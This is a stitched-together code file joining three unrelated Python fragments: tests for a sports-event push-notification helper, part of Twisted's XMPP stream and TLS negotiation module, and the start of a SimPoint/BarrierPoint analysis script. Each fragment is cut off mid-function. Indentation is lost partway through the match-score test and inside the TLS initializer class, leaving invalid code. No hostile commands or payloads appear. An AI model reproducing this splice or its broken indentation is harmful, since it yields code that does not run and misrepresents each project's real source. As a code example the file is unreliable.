        model_key='frc7332',
        model_type=ModelType.TEAM,
        notification_types=[NotificationType.ALLIANCE_SELECTION]
    ).put()
    Subscription(
        parent=ndb.Key(Account, 'user_id_3'),
        user_id='user_id_3',
        model_key=self.event.key_name,
        model_type=ModelType.EVENT,
        notification_types=[NotificationType.ALLIANCE_SELECTION]
    ).put()
    # Insert EventDetails for the event with alliance selection information
    EventDetails(
        id=self.event.key_name,
        alliance_selections=[
            {"declines": [], "picks": ["frc7332"]}
        ]
    ).put()
    with patch.object(TBANSHelper, '_send') as mock_send:
        TBANSHelper.alliance_selection(self.event)
        # Two calls total - First to the Event, second to frc7332, no call for frc1
        mock_send.assert_called()
        self.assertEqual(len(mock_send.call_args_list), 2)
        # call[0][0] is the recipient list for each _send call; x[0] unwraps
        # the single user id from each list.
        self.assertEqual([x[0] for x in [call[0][0] for call in mock_send.call_args_list]], ['user_id_3', 'user_id_2'])
        notifications = [call[0][1] for call in mock_send.call_args_list]
        for notification in notifications:
            self.assertTrue(isinstance(notification, AllianceSelectionNotification))
        # Check Event notification (no team attached)
        event_notification = notifications[0]
        self.assertEqual(event_notification.event, self.event)
        self.assertIsNone(event_notification.team)
        # Check frc7332 notification
        team_notification = notifications[1]
        self.assertEqual(team_notification.event, self.event)
        self.assertEqual(team_notification.team, self.team)
def test_awards_no_users(self):
    """No subscribers means _send is never invoked."""
    with patch.object(TBANSHelper, '_send') as send_mock:
        TBANSHelper.awards(self.event)
        send_mock.assert_not_called()
def test_awards_user_id(self):
    """An explicit user_id routes the notification to exactly that user."""
    with patch.object(TBANSHelper, '_send') as send_mock:
        TBANSHelper.awards(self.event, 'user_id')
        send_mock.assert_called_once()
        # First positional arg of _send is the recipient user-id list.
        self.assertEqual(send_mock.call_args[0][0], ['user_id'])
def test_awards(self):
    """Awards fan-out: the Event subscriber plus each awarded team's
    subscriber gets an AwardsNotification carrying that team's awards."""
    # Insert some Awards for some Teams
    award = Award(
        id=Award.render_key_name(self.event.key_name, AwardType.INDUSTRIAL_DESIGN),
        name_str='Industrial Design Award sponsored by General Motors',
        award_type_enum=AwardType.INDUSTRIAL_DESIGN,
        event=self.event.key,
        event_type_enum=EventType.REGIONAL,
        team_list=[ndb.Key(Team, 'frc7332')],
        year=2020
    )
    award.put()
    winner_award = Award(
        id=Award.render_key_name(self.event.key_name, AwardType.WINNER),
        name_str='Regional Event Winner',
        award_type_enum=AwardType.WINNER,
        event=self.event.key,
        event_type_enum=EventType.REGIONAL,
        team_list=[ndb.Key(Team, 'frc7332'), ndb.Key(Team, 'frc1')],
        year=2020
    )
    winner_award.put()
    frc_1 = Team(
        id='frc1',
        team_number=1
    )
    frc_1.put()
    # Insert a Subscription for this Event and these Teams so we call to send
    Subscription(
        parent=ndb.Key(Account, 'user_id_1'),
        user_id='user_id_1',
        model_key='frc1',
        model_type=ModelType.TEAM,
        notification_types=[NotificationType.AWARDS]
    ).put()
    Subscription(
        parent=ndb.Key(Account, 'user_id_2'),
        user_id='user_id_2',
        model_key='frc7332',
        model_type=ModelType.TEAM,
        notification_types=[NotificationType.AWARDS]
    ).put()
    Subscription(
        parent=ndb.Key(Account, 'user_id_3'),
        user_id='user_id_3',
        model_key=self.event.key_name,
        model_type=ModelType.EVENT,
        notification_types=[NotificationType.AWARDS]
    ).put()
    with patch.object(TBANSHelper, '_send') as mock_send:
        TBANSHelper.awards(self.event)
        # Three calls total - First to the Event, second to frc1 (one award),
        # third to frc7332 (two awards) — matching the order asserted below.
        mock_send.assert_called()
        self.assertEqual(len(mock_send.call_args_list), 3)
        self.assertEqual([x[0] for x in [call[0][0] for call in mock_send.call_args_list]], ['user_id_3', 'user_id_1', 'user_id_2'])
        notifications = [call[0][1] for call in mock_send.call_args_list]
        for notification in notifications:
            self.assertTrue(isinstance(notification, AwardsNotification))
        # Check Event notification (no team, no team_awards)
        event_notification = notifications[0]
        self.assertEqual(event_notification.event, self.event)
        self.assertIsNone(event_notification.team)
        self.assertEqual(event_notification.team_awards, [])
        # Check frc1 notification
        event_notification = notifications[1]
        self.assertEqual(event_notification.event, self.event)
        self.assertEqual(event_notification.team, frc_1)
        self.assertEqual(len(event_notification.team_awards), 1)
        # Check frc7332 notification
        event_notification = notifications[2]
        self.assertEqual(event_notification.event, self.event)
        self.assertEqual(event_notification.team, self.team)
        self.assertEqual(len(event_notification.team_awards), 2)
def test_broadcast_none(self):
    """Broadcasting to an empty client-type list sends nothing anywhere."""
    from notifications.base_notification import BaseNotification
    with patch.object(BaseNotification, 'send') as send_mock:
        TBANSHelper.broadcast([], 'Broadcast', 'Test broadcast')
        # Legacy Android path must stay untouched.
        send_mock.assert_not_called()
    # Nothing should have been queued for FCM or webhook delivery either.
    self.assertEqual(len(self.taskqueue_stub.GetTasks('push-notifications')), 0)
def test_broadcast_fcm_empty(self):
    """For every FCM client type, broadcasting with no registered clients
    sends nothing."""
    from notifications.base_notification import BaseNotification
    for fcm_type in ClientType.FCM_CLIENTS:
        with patch.object(BaseNotification, 'send') as send_mock:
            TBANSHelper.broadcast([fcm_type], 'Broadcast', 'Test broadcast')
            # Legacy Android path must stay untouched.
            send_mock.assert_not_called()
        # Nothing queued for FCM or webhook delivery either.
        self.assertEqual(len(self.taskqueue_stub.GetTasks('push-notifications')), 0)
def test_broadcast_fcm(self):
    """For each FCM client type: broadcasting enqueues a deferred task that
    ultimately calls _send_fcm with the client and a BroadcastNotification."""
    for client_type in ClientType.FCM_CLIENTS:
        client = MobileClient(
            parent=ndb.Key(Account, 'user_id'),
            user_id='user_id',
            messaging_id='token',
            client_type=client_type,
            device_uuid='uuid',
            display_name='Phone')
        client_key = client.put()
        from notifications.base_notification import BaseNotification
        with patch.object(BaseNotification, 'send') as mock_send:
            TBANSHelper.broadcast([client_type], 'Broadcast', 'Test broadcast')
            # Make sure we didn't send to Android
            mock_send.assert_not_called()
        # Make sure we'll send to FCM clients
        tasks = self.taskqueue_stub.get_filtered_tasks(queue_names='push-notifications')
        self.assertEqual(len(tasks), 1)
        # Make sure our taskqueue tasks execute what we expect
        with patch.object(TBANSHelper, '_send_fcm') as mock_send_fcm:
            deferred.run(tasks[0].payload)
            mock_send_fcm.assert_called_once_with([client], ANY)
            # Make sure the notification is a BroadcastNotification
            notification = mock_send_fcm.call_args[0][1]
            self.assertTrue(isinstance(notification, BroadcastNotification))
        # Reset queue and datastore state before the next client type.
        self.taskqueue_stub.FlushQueue('push-notifications')
        client_key.delete()
def test_broadcast_webhook_empty(self):
    """Broadcasting to webhooks with no registered clients sends nothing."""
    from notifications.base_notification import BaseNotification
    with patch.object(BaseNotification, 'send') as send_mock:
        TBANSHelper.broadcast([ClientType.WEBHOOK], 'Broadcast', 'Test broadcast')
        # Legacy Android path must stay untouched.
        send_mock.assert_not_called()
    # Nothing queued for FCM or webhook delivery either.
    self.assertEqual(len(self.taskqueue_stub.GetTasks('push-notifications')), 0)
def test_broadcast_webhook(self):
    """A registered webhook client: broadcasting enqueues a deferred task that
    ultimately calls _send_webhook with the client and a BroadcastNotification."""
    from notifications.base_notification import BaseNotification
    client = MobileClient(
        parent=ndb.Key(Account, 'user_id'),
        user_id='user_id',
        messaging_id='token',
        client_type=ClientType.WEBHOOK,
        device_uuid='uuid',
        display_name='Phone')
    client_key = client.put()
    with patch.object(BaseNotification, 'send') as mock_send:
        TBANSHelper.broadcast([ClientType.WEBHOOK], 'Broadcast', 'Test broadcast')
        # Make sure we didn't send to Android
        mock_send.assert_not_called()
    # Make sure we'll send to webhook clients via the taskqueue
    tasks = self.taskqueue_stub.get_filtered_tasks(queue_names='push-notifications')
    self.assertEqual(len(tasks), 1)
    # Make sure our taskqueue tasks execute what we expect
    with patch.object(TBANSHelper, '_send_webhook') as mock_send_webhook:
        deferred.run(tasks[0].payload)
        mock_send_webhook.assert_called_once_with([client], ANY)
        # Make sure the notification is a BroadcastNotification
        notification = mock_send_webhook.call_args[0][1]
        self.assertTrue(isinstance(notification, BroadcastNotification))
def test_broadcast_android(self):
    """Legacy Android clients are sent to synchronously via
    BroadcastNotification.send, not through the taskqueue."""
    client_type = ClientType.OS_ANDROID
    messaging_id = 'token'
    client = MobileClient(
        parent=ndb.Key(Account, 'user_id'),
        user_id='user_id',
        messaging_id=messaging_id,
        client_type=client_type,
        device_uuid='uuid',
        display_name='Phone')
    client.put()
    from notifications.broadcast import BroadcastNotification
    with patch.object(BroadcastNotification, 'send') as mock_send:
        TBANSHelper.broadcast([client_type], 'Broadcast', 'Test broadcast')
        # send receives a {client_type: [messaging_ids]} mapping.
        mock_send.assert_called_once_with({client_type: [messaging_id]})
    # Make sure we didn't send to FCM or webhooks
    tasks = self.taskqueue_stub.GetTasks('push-notifications')
    self.assertEqual(len(tasks), 0)
def test_event_level_no_users(self):
    """No subscribers means _send is never invoked."""
    with patch.object(TBANSHelper, '_send') as send_mock:
        TBANSHelper.event_level(self.match)
        send_mock.assert_not_called()
def test_event_level_user_id(self):
    """An explicit user_id yields a single _send to exactly that user."""
    with patch.object(TBANSHelper, '_send') as send_mock:
        TBANSHelper.event_level(self.match, 'user_id')
        send_mock.assert_called()
        self.assertEqual(len(send_mock.call_args_list), 1)
        # Every call's recipient list is just the explicit user.
        self.assertEqual(send_mock.call_args[0][0], ['user_id'])
def test_event_level(self):
    """A LEVEL_STARTING event subscription produces one
    EventLevelNotification carrying the match and its event."""
    # Insert a Subscription for this Event
    Subscription(
        parent=ndb.Key(Account, 'user_id_1'),
        user_id='user_id_1',
        model_key=self.event.key_name,
        model_type=ModelType.EVENT,
        notification_types=[NotificationType.LEVEL_STARTING]
    ).put()
    with patch.object(TBANSHelper, '_send') as mock_send:
        TBANSHelper.event_level(self.match)
        mock_send.assert_called()
        self.assertEqual(len(mock_send.call_args_list), 1)
        user_ids = mock_send.call_args[0][0]
        self.assertEqual(user_ids, ['user_id_1'])
        notification = mock_send.call_args[0][1]
        self.assertTrue(isinstance(notification, EventLevelNotification))
        self.assertEqual(notification.match, self.match)
        self.assertEqual(notification.event, self.event)
def test_event_schedule_no_users(self):
    """No subscribers means _send is never invoked."""
    with patch.object(TBANSHelper, '_send') as send_mock:
        TBANSHelper.event_schedule(self.event)
        send_mock.assert_not_called()
def test_event_schedule_user_id(self):
    """An explicit user_id yields a single _send to exactly that user."""
    with patch.object(TBANSHelper, '_send') as send_mock:
        TBANSHelper.event_schedule(self.event, 'user_id')
        send_mock.assert_called()
        self.assertEqual(len(send_mock.call_args_list), 1)
        # Every call's recipient list is just the explicit user.
        self.assertEqual(send_mock.call_args[0][0], ['user_id'])
def test_event_schedule(self):
    """A SCHEDULE_UPDATED event subscription produces one
    EventScheduleNotification carrying the event."""
    # Insert a Subscription for this Event
    Subscription(
        parent=ndb.Key(Account, 'user_id_1'),
        user_id='user_id_1',
        model_key=self.event.key_name,
        model_type=ModelType.EVENT,
        notification_types=[NotificationType.SCHEDULE_UPDATED]
    ).put()
    with patch.object(TBANSHelper, '_send') as mock_send:
        TBANSHelper.event_schedule(self.event)
        mock_send.assert_called()
        self.assertEqual(len(mock_send.call_args_list), 1)
        user_ids = mock_send.call_args[0][0]
        self.assertEqual(user_ids, ['user_id_1'])
        notification = mock_send.call_args[0][1]
        self.assertTrue(isinstance(notification, EventScheduleNotification))
        self.assertEqual(notification.event, self.event)
def test_match_score_no_users(self):
    """No subscribers means _send is never invoked."""
    with patch.object(TBANSHelper, '_send') as send_mock:
        TBANSHelper.match_score(self.match)
        send_mock.assert_not_called()
def test_match_score_user_id(self):
    """match_score with an explicit user_id issues three _send calls, all to
    that user, and schedules the upcoming-match notification once for the
    same user."""
    # Set some upcoming matches for the Event
    match_creator = MatchTestCreator(self.event)
    teams = [Team(id="frc%s" % team_number, team_number=team_number) for team_number in range(6)]
    self.event._teams = teams
    match_creator.createIncompleteQuals()
    # Test send called with user id
    with patch.object(TBANSHelper, '_send') as mock_send, patch.object(TBANSHelper, 'schedule_upcoming_match') as schedule_upcoming_match:
        TBANSHelper.match_score(self.match, 'user_id')
        mock_send.assert_called()
        self.assertEqual(len(mock_send.call_args_list), 3)
        for call in mock_send.call_args_list:
            self.assertEqual(call[0][0], ['user_id'])
        # Make sure we called upcoming_match with the same user_id
        schedule_upcoming_match.assert_called()
        self.assertEqual(len(schedule_upcoming_match.call_args_list), 1)
        self.assertEqual(schedule_upcoming_match.call_args[0][1], 'user_id')
def test_match_score(self):
# Insert a Subscription for this Event, Team, and Match so we call to send
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key=self.event.key_name,
model_type=ModelType.EVENT,
notification_types=[NotificationType.MATCH_SCORE]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.MATCH_SCORE]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_3'),
user_id='user_id_3',
model_key=self.match.key_name,
model_type=ModelType.MATCH,
notification_types=[NotificationType.MATCH_SCORE]
).put()
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.match_score(self.match)
# Three calls total - First to the Event, second to Team | |
# <gh_stars>1-10
# -*- test-case-name: twisted.words.test.test_jabberxmlstream -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
XMPP XML Streams
Building blocks for setting up XML Streams, including helping classes for
doing authentication on either client or server side, and working with XML
Stanzas.
"""
from hashlib import sha1
from zope.interface import directlyProvides, implements
from twisted.internet import defer, protocol
from twisted.internet.error import ConnectionLost
from twisted.python import failure, log, randbytes
from twisted.words.protocols.jabber import error, ijabber, jid
from twisted.words.xish import domish, xmlstream
from twisted.words.xish.xmlstream import STREAM_CONNECTED_EVENT
from twisted.words.xish.xmlstream import STREAM_START_EVENT
from twisted.words.xish.xmlstream import STREAM_END_EVENT
from twisted.words.xish.xmlstream import STREAM_ERROR_EVENT
try:
from twisted.internet import ssl
except ImportError:
ssl = None
if ssl and not ssl.supported:
ssl = None
STREAM_AUTHD_EVENT = intern("//event/stream/authd")
INIT_FAILED_EVENT = intern("//event/xmpp/initfailed")
NS_STREAMS = 'http://etherx.jabber.org/streams'
NS_XMPP_TLS = 'urn:ietf:params:xml:ns:xmpp-tls'
Reset = object()
def hashPassword(sid, password):
    """
    Create a SHA1-digest string of a session identifier and password.

    @param sid: The stream session identifier.
    @type sid: C{unicode}.
    @param password: The password to be hashed.
    @type password: C{unicode}.
    @return: hex-encoded SHA1 digest of the UTF-8 encoding of C{sid + password}.
    @rtype: C{str}
    @raise TypeError: if C{sid} or C{password} is not a unicode object.
    """
    if not isinstance(sid, unicode):
        raise TypeError("The session identifier must be a unicode object")
    if not isinstance(password, unicode):
        raise TypeError("The password must be a unicode object")
    # Renamed from `input`, which shadowed the builtin of the same name.
    hashable = u"%s%s" % (sid, password)
    return sha1(hashable.encode('utf-8')).hexdigest()
class Authenticator:
    """
    Base class for the business logic that initializes an XmlStream.

    Subclass this to let an XmlStream initialize and authenticate against
    different kinds of stream hosts (clients, components, etc.).

    Rules:
      1. The Authenticator MUST dispatch a L{STREAM_AUTHD_EVENT} when the
         stream has been completely initialized.
      2. The Authenticator SHOULD reset all state information when
         L{associateWithStream} is called.
      3. The Authenticator SHOULD override L{streamStarted}, and start
         initialization there.

    @type xmlstream: L{XmlStream}
    @ivar xmlstream: The XmlStream that needs authentication

    @note: the term authenticator is historical. Authenticators perform
           all steps required to prepare the stream for the exchange
           of XML stanzas.
    """

    def __init__(self):
        self.xmlstream = None

    def connectionMade(self):
        """
        Called by the XmlStream when the underlying socket connection is
        in place.

        This gives the Authenticator a chance to send an initial root
        element (when connecting) or to wait for an inbound root from the
        peer (when accepting). Subclasses can use self.xmlstream.send() to
        transmit any initial data to the peer.
        """

    def streamStarted(self, rootElement):
        """
        Called by the XmlStream once the start tag of the root element has
        been received.

        Reads the C{version} attribute from C{rootElement}, defaulting to
        C{(0, 0)} per RFC 3920 when it is absent or malformed, and stores
        the minimum of that and the version already held by L{xmlstream}
        back into L{xmlstream}.

        Subclasses may extract more information from the stream header and
        perform checks on it, optionally sending stream errors and closing
        the stream.
        """
        version = (0, 0)
        if rootElement.hasAttribute("version"):
            parts = rootElement["version"].split(".")
            try:
                version = (int(parts[0]), int(parts[1]))
            except (IndexError, ValueError):
                version = (0, 0)
        self.xmlstream.version = min(self.xmlstream.version, version)

    def associateWithStream(self, xmlstream):
        """
        Called by the XmlStreamFactory once a connection has been made and
        an XmlStream instantiated; keeps a handle to the new XmlStream.

        @type xmlstream: L{XmlStream}
        @param xmlstream: The XmlStream that will be passing events to this
                          Authenticator.
        """
        self.xmlstream = xmlstream
class ConnectAuthenticator(Authenticator):
    """
    Authenticator for initiating entities.
    """
    # Stream namespace; set by subclasses (None here).
    namespace = None

    def __init__(self, otherHost):
        # Hostname of the receiving entity we will connect to.
        self.otherHost = otherHost

    def connectionMade(self):
        # As the initiating entity, immediately send the stream header.
        self.xmlstream.namespace = self.namespace
        self.xmlstream.otherEntity = jid.internJID(self.otherHost)
        self.xmlstream.sendHeader()

    def initializeStream(self):
        """
        Perform stream initialization procedures.

        An L{XmlStream} holds a list of initializer objects in its
        C{initializers} attribute. This method calls these initializers in
        order and dispatches the C{STREAM_AUTHD_EVENT} event when the list has
        been successfully processed. Otherwise it dispatches the
        C{INIT_FAILED_EVENT} event with the failure.

        Initializers may return the special L{Reset} object to halt the
        initialization processing. It signals that the current initializer was
        successfully processed, but that the XML Stream has been reset. An
        example is the TLSInitiatingInitializer.
        """
        def remove_first(result):
            # Pop the initializer only after it completed successfully,
            # then pass the result through to the next callback.
            self.xmlstream.initializers.pop(0)
            return result

        def do_next(result):
            """
            Take the first initializer and process it.

            On success, the initializer is removed from the list and
            then next initializer will be tried.
            """
            if result is Reset:
                # Stream was reset by the initializer; stop processing here.
                return None

            try:
                init = self.xmlstream.initializers[0]
            except IndexError:
                # All initializers done: the stream is fully initialized.
                self.xmlstream.dispatch(self.xmlstream, STREAM_AUTHD_EVENT)
                return None
            else:
                # Chain: run initializer, drop it from the list, recurse.
                d = defer.maybeDeferred(init.initialize)
                d.addCallback(remove_first)
                d.addCallback(do_next)
                return d

        d = defer.succeed(None)
        d.addCallback(do_next)
        # Any failure anywhere in the chain is reported as INIT_FAILED_EVENT.
        d.addErrback(self.xmlstream.dispatch, INIT_FAILED_EVENT)

    def streamStarted(self, rootElement):
        """
        Called by the XmlStream when the stream has started.

        This extends L{Authenticator.streamStarted} to extract further stream
        headers from C{rootElement}, optionally wait for stream features being
        received and then call C{initializeStream}.
        """
        Authenticator.streamStarted(self, rootElement)

        self.xmlstream.sid = rootElement.getAttribute("id")

        if rootElement.hasAttribute("from"):
            self.xmlstream.otherEntity = jid.internJID(rootElement["from"])

        # Setup observer for stream features, if applicable
        if self.xmlstream.version >= (1, 0):
            def onFeatures(element):
                # Index advertised features by (uri, name) for initializers.
                features = {}
                for feature in element.elements():
                    features[(feature.uri, feature.name)] = feature
                self.xmlstream.features = features
                self.initializeStream()

            self.xmlstream.addOnetimeObserver('/features[@xmlns="%s"]' %
                                                  NS_STREAMS,
                                              onFeatures)
        else:
            # Pre-1.0 streams advertise no features; initialize right away.
            self.initializeStream()
class ListenAuthenticator(Authenticator):
    """
    Authenticator for receiving entities.
    """
    # Stream namespace; filled in from the initiating entity's header.
    namespace = None

    def associateWithStream(self, xmlstream):
        """
        Called by the XmlStreamFactory when a connection has been made.

        Extend L{Authenticator.associateWithStream} to set the L{XmlStream}
        to be non-initiating.
        """
        Authenticator.associateWithStream(self, xmlstream)
        self.xmlstream.initiating = False

    def streamStarted(self, rootElement):
        """
        Called by the XmlStream when the stream has started.

        This extends L{Authenticator.streamStarted} to extract further
        information from the stream headers from C{rootElement}.
        """
        Authenticator.streamStarted(self, rootElement)
        self.xmlstream.namespace = rootElement.defaultUri
        if rootElement.hasAttribute("to"):
            self.xmlstream.thisEntity = jid.internJID(rootElement["to"])
        # Record the peer's namespace prefix declarations, keyed by URI.
        self.xmlstream.prefixes = {}
        # NOTE: iteritems() is a Python 2 API; this module targets Python 2.
        for prefix, uri in rootElement.localPrefixes.iteritems():
            self.xmlstream.prefixes[uri] = prefix
        # Assign a random session identifier for this stream
        # (unicode / str.encode('hex') are Python-2-only constructs).
        self.xmlstream.sid = unicode(randbytes.secureRandom(8).encode('hex'))
class FeatureNotAdvertized(Exception):
    """
    Exception indicating a stream feature was not advertized, while required by
    the initiating entity.

    Raised by L{BaseFeatureInitiatingInitializer.initialize} when the
    feature is marked C{required} but absent from the stream features.
    """
class BaseFeatureInitiatingInitializer(object):
    """
    Base class for initializers that are tied to a stream feature.

    This assumes the associated XmlStream represents the initiating entity
    of the connection. Subclasses check whether the receiving entity
    advertized the feature identified by C{feature} and, if so, run their
    C{start} routine.

    @cvar feature: tuple of (uri, name) of the stream feature root element.
    @type feature: tuple of (C{str}, C{str})
    @ivar required: whether the stream feature is required to be advertized
        by the receiving entity.
    @type required: C{bool}
    """
    implements(ijabber.IInitiatingInitializer)
    feature = None
    required = False

    def __init__(self, xs):
        self.xmlstream = xs

    def initialize(self):
        """
        Initiate the initialization.

        When the receiving entity advertizes the stream feature, hand off
        to C{start}. When the feature is absent, either raise
        L{FeatureNotAdvertized} (if C{required} is set) or silently succeed.
        """
        if self.feature not in self.xmlstream.features:
            if self.required:
                raise FeatureNotAdvertized
            return None
        return self.start()

    def start(self):
        """
        Start the actual initialization.

        May return a deferred for asynchronous initialization.
        """
class TLSError(Exception):
    """
    TLS base exception.

    Base class for all TLS negotiation related errors in this module.
    """
class TLSFailed(TLSError):
    """
    Exception indicating failed TLS negotiation.
    """
class TLSRequired(TLSError):
    """
    Exception indicating required TLS negotiation.

    This exception is raised when the receiving entity requires TLS
    negotiation and the initiating does not desire to negotiate TLS.
    """
class TLSNotSupported(TLSError):
    """
    Exception indicating missing TLS support.

    This exception is raised when the initiating entity wants and requires to
    negotiate TLS when the OpenSSL library is not available.
    """
class TLSInitiatingInitializer(BaseFeatureInitiatingInitializer):
"""
TLS stream initializer for the initiating entity.
It is strongly required to include this initializer in the list of
initializers for an XMPP stream. By default it will try to negotiate TLS.
An XMPP server may indicate that TLS is required. If TLS is not desired,
set the C{wanted} attribute to False instead of removing it from the list
of initializers, so a proper exception L{TLSRequired} can be raised.
@cvar wanted: indicates if TLS negotiation is wanted.
@type wanted: C{bool}
"""
feature = (NS_XMPP_TLS, 'starttls')
wanted = True
_deferred = None
def onProceed(self, obj):
    """
    Proceed with TLS negotiation and reset the XML stream.
    """
    # The failure observer is obsolete once the server agreed to TLS.
    self.xmlstream.removeObserver('/failure', self.onFailure)
    ctx = ssl.CertificateOptions()
    # Wrap the transport in TLS, then reset the XML parser and resend the
    # stream header over the now-encrypted channel.
    self.xmlstream.transport.startTLS(ctx)
    self.xmlstream.reset()
    self.xmlstream.sendHeader()
    # Fire the Reset marker so initializeStream stops this pass; a new
    # feature negotiation round follows on the fresh stream.
    self._deferred.callback(Reset)
def onFailure(self, obj):
    # The server refused TLS: drop the proceed observer and fail the
    # initializer's deferred with TLSFailed.
    self.xmlstream.removeObserver('/proceed', self.onProceed)
    self._deferred.errback(TLSFailed())
def start(self):
"""
Start TLS negotiation.
This checks if the receiving entity requires TLS, the SSL library is
available and uses the C{required} and C{wanted} instance variables to
determine what to do in the various different cases.
For example, if the SSL library is not available, and wanted and
required by the user, it raises an exception. However if it is not
required by both parties, initialization silently succeeds, moving
on to the next step.
"""
| |
<filename>DrAnalysis.py
#!/usr/bin/env python
# Copyright (c) 2020, Arm Limited and Contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import subprocess
import argparse
import gzip
import functools
import json
from itertools import product
import sys
class SimPoints(object):
    """
    Wrapper around the SimPoint clustering tool.

    The constructor builds the SimPoint command line from its arguments,
    immediately runs the tool on the given (gzipped, sparse-format)
    frequency-vector file and parses the resulting simpoints / weights /
    labels files into the ``SPData`` dictionary.
    """

    def __init__(self, BBfile='bbvbarrier.bb.gz', fixedLength='off',
                 deleteSPOut=False, maxK=20, dim=15, outputfiles='./'):
        """
        Configure and run SimPoint.

        :param BBfile: unprojected sparse-format frequency vector file; the
            file is compressed with gzip (hence ``-inputVectorsGzipped``).
        :param fixedLength: 'off'/'on', or one of the special modes (4, 3,
            2/'normalize') which select a normalizing SimPoint binary and a
            k-means initialization scheme; any other value is coerced via
            ``bool()`` to 'on'/'off'.
        :param deleteSPOut: delete the temporary output files after parsing.
        :param maxK: maximum number of clusters for the binary search on k
            (original SimPoint value: 15, original BarrierPoint value: 20).
        :param dim: number of dimensions to randomly project the frequency
            vectors down to (default 15; 0 disables projection).
        :param outputfiles: prefix for the temporary output files.
        """
        self.logger = logging.getLogger('BarrierPoint.simpoint')
        self.BBfile = BBfile
        self.extraOpts = []      # extra options, filled per fixedLength mode
        self.execF = './simpoint'
        self.fixedLength = fixedLength
        if fixedLength == 4:
            self.fixedLength = 'on'
            # initialize k-means by sampling
            self.extraOpts.append('-initkm samp')
            self.execF = './simpoint.normalize2'
        elif fixedLength == 3:
            self.fixedLength = 'on'
            self.extraOpts.append('-initkm samp')
            self.execF = './simpoint.normalize'
        elif fixedLength == 2 or fixedLength == 'normalize':
            self.fixedLength = 'on'
            # initialize k-means by furthest-first
            self.extraOpts.append('-initkm ff')
            self.execF = './simpoint.normalize'
        elif fixedLength not in ('off', 'on'):
            # coerce any other truthy/falsy value to the expected strings;
            # for barrier points the vectors are not fixed-length
            self.fixedLength = {False: 'off', True: 'on'}[bool(fixedLength)]
        self.deleteSPOut = deleteSPOut   # remove temporary files after use?
        self.tSimPoints = '{}t.simpoints'.format(outputfiles)
        self.tWeights = '{}t.weights'.format(outputfiles)
        self.tLabels = '{}t.labels'.format(outputfiles)
        # binary search for k ('search' mode), up to maxK clusters
        self.maxK = maxK
        self.dim = 'noProject' if (dim == 0) else dim
        self.execCmd = """{} -loadFVFile "{}" -inputVectorsGzipped -fixedLength {} -maxK {} -dim {} \
-coveragePct 1.0 -saveSimpoints {} -saveSimpointWeights {} -saveLabels {} \
-verbose 0 {}""".format(self.execF, self.BBfile, self.fixedLength, self.maxK,
                        self.dim, self.tSimPoints, self.tWeights, self.tLabels,
                        ' '.join(self.extraOpts))
        self.SPData = dict()     # result of the clustering
        # Call the SimPoint tool right away.
        self.logger.info('Starting SimPoint')
        if not self.RunSimPoints():
            self.logger.error('SimPoint clustering failed')
        self.logger.info('Finished SimPoint')

    def getSimPointData(self):
        """
        Return the results of the SimPoint clustering.

        ``SPData`` is a dictionary of lists; keys: id, weights, simpoints,
        labels, match.
        """
        return self.SPData

    def RunSimPoints(self):
        """Run the SimPoint tool and parse its output; return success."""
        self.logger.debug("Executing command:\n{}".format(self.execCmd))
        proc = subprocess.Popen(['bash', '-c', self.execCmd])
        proc.communicate()
        if proc.returncode != 0:
            # logger.warn is a deprecated alias of logger.warning
            self.logger.warning("Process {} returned {} code".format(
                self.execCmd, proc.returncode))
            return False
        self.logger.debug('Data analysis')
        if not self.AnalysisSimPoints():
            self.logger.warning('SimPoints analysis returned with errors')
            return False
        return True

    def AnalysisSimPoints(self):
        """
        Parse the SimPoint output files into ``SPData``; return success.

        To compute SimPoints we are skipping the first BP, the one from the
        start of the ROI to the first parallel region; however, to ease the
        performance evaluation with performance counters we assume that BP
        to be #0.  Hence, we have to shift the BP identifiers by 1
        afterwards.

        :returns: True on success, False if any file is missing or
            malformed.
        """
        self.SPData['id'] = []
        self.SPData['weights'] = []
        # tWeights file format: "weight id" per line
        try:
            # 'with' guarantees the file is closed on every exit path
            with open(self.tWeights, 'r') as _wfile:
                for line in _wfile:
                    weight, num = line.split()
                    self.SPData['id'].append(int(num))
                    self.SPData['weights'].append(float(weight))
        except (OSError, ValueError) as err:
            # ValueError covers malformed lines (bad field count / numbers)
            self.logger.error('{} tWeights: {}'.format(err, self.tWeights))
            return False
        self.SPData['simpoints'] = []
        # tSimPoints file format: "simpoint id" per line; the id column must
        # match the ids read from tWeights, in order
        try:
            with open(self.tSimPoints, 'r') as _sfile:
                for i, line in enumerate(_sfile):
                    sp, num = line.split()
                    if int(num) != self.SPData['id'][i]:
                        self.logger.error('Invalid SimPoint index')
                        return False
                    self.SPData['simpoints'].append(int(sp))
        except (OSError, ValueError) as err:
            self.logger.error(
                '{} tSimPoints: {}'.format(err, self.tSimPoints))
            return False
        self.SPData['labels'] = []
        self.SPData['match'] = []
        # tLabels file format: "label match" per line, where label is the id
        # of the assigned cluster for each barrier point and match is the
        # distance from center of each input vector (i.e., barrier point)
        try:
            with open(self.tLabels, 'r') as _lfile:
                for line in _lfile:
                    label, match = line.split()
                    self.SPData['labels'].append(int(label))
                    self.SPData['match'].append(float(match))
        except (OSError, ValueError) as err:
            self.logger.error('{} tLabels: {}'.format(err, self.tLabels))
            return False
        # Clean up the temporary files if requested.
        if self.deleteSPOut:
            for f in (self.tWeights, self.tSimPoints, self.tLabels):
                try:
                    os.remove(f)
                except OSError:
                    # narrowed from a bare 'except:' -- only file-system
                    # errors are expected and tolerated here
                    self.logger.warning(
                        "File {} could not be removed".format(f))
        return True
class BarrierPoints(object):
# Run analysis to obtain the barrier points
def __init__(self, miniApp, nthreads, appParams, outpath='./tmp', out_suffix='',
             iteration=1, benchpath='./benchmarks', drpath=''):
    """
    Set up paths and parameters for a barrier-point analysis run.

    :param miniApp: name of the benchmark application.
    :param nthreads: number of threads to run with.
